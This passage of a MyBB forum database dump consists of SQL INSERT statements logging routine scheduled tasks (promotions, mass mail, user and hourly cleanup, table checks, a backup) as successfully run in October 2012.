VALUES ('10274', '5', '1350266806', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10275', '9', '1350267161', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10276', '5', '1350267904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10277', '9', '1350268003', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10278', '3', '1350268208', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10279', '9', '1350268826', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10280', '5', '1350269218', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10281', '9', '1350269836', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10282', '3', '1350270039', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10283', '1', '1350270040', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10284', '7', '1350270097', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10285', '5', '1350271138', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10286', '9', '1350271149', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10287', '5', '1350271599', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10288', '9', '1350271606', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10289', '3', '1350272012', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10290', '9', '1350272417', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10291', '5', '1350272730', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10292', '9', '1350273315', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10293', '3', '1350273565', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10294', '1', '1350273681', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10295', '7', '1350273907', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10296', '5', '1350273912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10297', '9', '1350274323', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10298', '5', '1350275163', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10299', '9', '1350275170', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10300', '3', '1350275600', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10301', '9', '1350276018', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10302', '5', '1350276308', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10303', '9', '1350276967', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10304', '3', '1350277204', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10305', '1', '1350277220', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10306', '7', '1350277229', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10307', '5', '1350277618', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10308', '9', '1350278221', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10309', '5', '1350278923', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10310', '9', '1350278951', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10311', '3', '1350279248', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10312', '9', '1350280496', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10313', '5', '1350280504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10314', '9', '1350280625', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10315', '3', '1350280766', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10316', '1', '1350280810', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10317', '7', '1350280821', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10318', '5', '1350281590', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10319', '9', '1350282944', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10320', '5', '1350283194', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10321', '3', '1350283321', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10322', '9', '1350283337', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10323', '5', '1350283507', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10324', '9', '1350287072', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10325', '3', '1350287598', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10326', '1', '1350288438', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10327', '7', '1350288486', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10328', '5', '1350288519', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10329', '9', '1350288543', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10330', '3', '1350288545', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10331', '9', '1350289238', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10332', '5', '1350289826', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10333', '9', '1350290562', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10334', '3', '1350290595', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10335', '5', '1350290714', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10336', '9', '1350291305', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10337', '3', '1350291554', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10338', '1', '1350291611', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10339', '7', '1350291619', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10340', '5', '1350291974', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10341', '9', '1350292424', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10342', '5', '1350293225', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10343', '9', '1350293228', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10344', '3', '1350293863', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10345', '9', '1350294036', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10346', '5', '1350294521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10347', '9', '1350295750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10348', '3', '1350295775', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10349', '1', '1350296330', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10350', '7', '1350296343', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10351', '5', '1350296445', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10352', '9', '1350296862', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10353', '5', '1350296883', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10354', '3', '1350297346', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10355', '9', '1350298282', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10356', '5', '1350298377', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10357', '9', '1350300968', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10358', '3', '1350300972', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10359', '1', '1350300987', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10360', '7', '1350300988', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10361', '5', '1350300991', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10362', '9', '1350302074', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10363', '5', '1350302124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10364', '9', '1350302142', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10365', '3', '1350302943', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10366', '1', '1350302950', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10367', '7', '1350302975', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10368', '4', '1350302970', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10369', '5', '1350302979', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10370', '9', '1350306115', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10371', '5', '1350306122', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10372', '3', '1350306137', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10373', '1', '1350306140', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10374', '7', '1350306152', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10375', '5', '1350307868', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10376', '9', '1350308170', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10377', '3', '1350308354', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10378', '9', '1350308549', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10379', '5', '1350308760', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10380', '9', '1350309725', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10381', '3', '1350309748', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10382', '1', '1350309959', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10383', '7', '1350309984', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10384', '5', '1350310291', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10385', '9', '1350310328', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10386', '5', '1350312524', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10387', '9', '1350313009', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10388', '3', '1350313046', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10389', '3', '1350315019', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10390', '1', '1350315026', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10391', '7', '1350315029', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10392', '5', '1350315234', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10393', '9', '1350315258', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10394', '9', '1350315624', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10395', '5', '1350316372', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10396', '9', '1350316949', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10397', '3', '1350316955', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10398', '1', '1350316960', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10399', '7', '1350318859', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10400', '5', '1350318906', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10401', '9', '1350319772', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10402', '3', '1350319781', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10403', '5', '1350319837', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10404', '9', '1350320205', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10405', '3', '1350321264', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10406', '1', '1350321281', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10407', '7', '1350321308', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10408', '5', '1350321311', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10409', '9', '1350321391', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10410', '5', '1350321905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10411', '9', '1350321933', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10412', '3', '1350322205', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10413', '9', '1350323349', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10414', '5', '1350323358', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10415', '9', '1350323825', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10416', '3', '1350324326', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10417', '1', '1350324343', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10418', '7', '1350324346', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10419', '5', '1350324749', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10420', '9', '1350324760', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10421', '5', '1350325705', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10422', '9', '1350325750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10423', '3', '1350326580', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10424', '9', '1350326788', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10425', '5', '1350326791', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10426', '9', '1350327402', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10427', '3', '1350327595', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10428', '1', '1350327670', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10429', '7', '1350327858', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10430', '5', '1350327950', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10431', '9', '1350328558', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10432', '5', '1350329101', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10433', '9', '1350329118', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10434', '3', '1350329407', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10435', '9', '1350330005', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10436', '5', '1350330302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10437', '9', '1350330941', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10438', '3', '1350331141', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10439', '1', '1350331209', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10440', '7', '1350331216', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10441', '5', '1350331509', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10442', '9', '1350332199', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10443', '5', '1350332717', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10444', '9', '1350332730', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10445', '3', '1350333028', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10446', '9', '1350333686', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10447', '5', '1350334072', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10448', '9', '1350334763', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10449', '3', '1350334768', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10450', '1', '1350334859', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10451', '7', '1350334861', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10452', '5', '1350335312', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10453', '9', '1350335585', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10454', '5', '1350336507', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10455', '9', '1350336546', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10456', '3', '1350336610', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10457', '9', '1350337730', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10458', '5', '1350337733', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10459', '9', '1350338153', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10460', '3', '1350338510', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10461', '1', '1350338518', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10462', '7', '1350338523', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10463', '5', '1350339626', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10464', '9', '1350339637', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10465', '5', '1350339919', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10466', '9', '1350339955', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10467', '3', '1350340387', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10468', '9', '1350341229', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10469', '5', '1350341238', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10470', '9', '1350341974', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10471', '3', '1350341977', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10472', '1', '1350342001', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10473', '7', '1350342011', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10474', '5', '1350342664', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10475', '9', '1350342680', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10476', '5', '1350343546', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10477', '9', '1350343937', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10478', '3', '1350343942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10479', '9', '1350344718', 'The mass mail task successfully ran.'); 